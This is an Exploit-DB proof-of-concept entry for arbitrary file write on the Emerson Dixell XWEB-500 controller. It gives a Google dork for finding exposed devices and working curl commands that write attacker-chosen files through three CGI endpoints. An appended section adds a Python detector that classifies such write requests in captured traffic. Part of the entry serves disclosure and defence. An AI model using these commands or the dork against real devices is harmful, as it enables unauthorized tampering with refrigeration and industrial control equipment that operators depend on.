Dixell XWEB 500 – Arbitrary File Write

  • Author: Roberto Palamaro
    Date: 2022-01-05
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50639/
  • # Exploit Title: Dixell XWEB-500 - Arbitrary File Write
    # Google Dork: inurl:"xweb500.cgi"
    # Date: 03/01/2022
    # Exploit Author: Roberto Palamaro
    # Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it
    # Version: XWEB-500
    # Tested on: Dixell XWEB-500
    # References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/
    
    # Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write vulnerabilities
    
    # Endpoint: logo_extra_upload.cgi
    # Here the first line of the PoC is the filename and the second one is the content of the file to be written
    # Write file
    echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
    # Verify
    curl -A Chrome -is "http://[target]:[port]/logo/"
    
    # Endpoint: lo_utils.cgi
    # Here ACTION=5 is to enable write mode
    echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
    # Verify using ACTION=3 to list resources
    echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
    
    # Endpoint: cal_save.cgi
    # Here the first line of the PoC is the filename and the second one is the content of the file to be written
    echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
    # Verify
    curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_dir.cgi"
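
For defenders, the body layouts described in the PoC comments are enough to pick write requests out of captured traffic. The following is an added example, not part of the original exploit entry: it assumes a sensor or reverse proxy that records method, URL and raw body, and the names `classify`, `findings` and the `xweb.example` host are hypothetical.

```python
# Added example: classify captured HTTP requests against the three XWEB-500
# CGI endpoints named above. Body layouts follow the PoC comments; the capture
# format (method, url, raw body) is an assumption about the sensor in use.
from urllib.parse import urlsplit

# Endpoints where body line 1 is the filename and the rest is file content.
NAME_FIRST = {"/cgi-bin/logo_extra_upload.cgi", "/cgi-bin/cal_save.cgi"}
LO_UTILS = "/cgi-bin/lo_utils.cgi"


def classify(method, url, body):
    """Return a finding dict for a file-write request, else None."""
    if method.upper() != "POST":
        return None
    path = urlsplit(url).path
    lines = body.splitlines()  # bytes: splits on \n, \r\n and \r only
    if path in NAME_FIRST and lines:
        name, content = lines[0], lines[1:]
    elif path == LO_UTILS and len(lines) >= 2 and lines[0].strip() == b"ACTION=5":
        # ACTION=5 is write mode; ACTION=3 only lists resources and is ignored.
        name, content = lines[1], lines[2:]
    else:
        return None
    return {"endpoint": path,
            "filename": name.decode("latin-1").strip(),
            "content_bytes": len(b"\n".join(content))}


# Constructed sample captures (not real traffic).
SAMPLES = [
    ("POST", "http://xweb.example/cgi-bin/logo_extra_upload.cgi", b"note.txt\nhello\n"),
    ("POST", "http://xweb.example/cgi-bin/lo_utils.cgi", b"ACTION=3\n"),
    ("POST", "http://xweb.example/cgi-bin/lo_utils.cgi", b"ACTION=5\nnote.txt\nhello\n"),
    ("POST", "http://xweb.example/cgi-bin/cal_save.cgi", b"cal.dat\nx=1\ny=2\n"),
    ("GET", "http://xweb.example/cgi-bin/cal_dir.cgi", b""),
]


def findings(samples=SAMPLES):
    """Run classify over the captures and keep only the write requests."""
    return [f for f in (classify(*s) for s in samples) if f]


if __name__ == "__main__":
    for f in findings():
        print(f)
```

Legitimate administration of the device may use the same endpoints, so each finding should be correlated with the source address and session before it is treated as an incident.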